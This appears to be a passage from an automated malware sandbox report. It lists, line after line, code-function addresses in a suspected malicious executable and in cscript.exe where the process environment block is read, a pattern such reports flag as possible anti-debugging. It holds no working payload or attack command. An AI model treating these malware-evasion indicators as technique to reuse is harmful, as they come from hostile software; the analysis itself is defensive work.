          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B35210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BBA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BE3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B78EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B68E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BF1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B48794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B5F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00C0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A5849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B18CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04AC6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A6746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A7A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04ADC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A71DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A71DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A71DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04B105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A72581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A72581 mov eax, dword ptr fs:[00000030h]
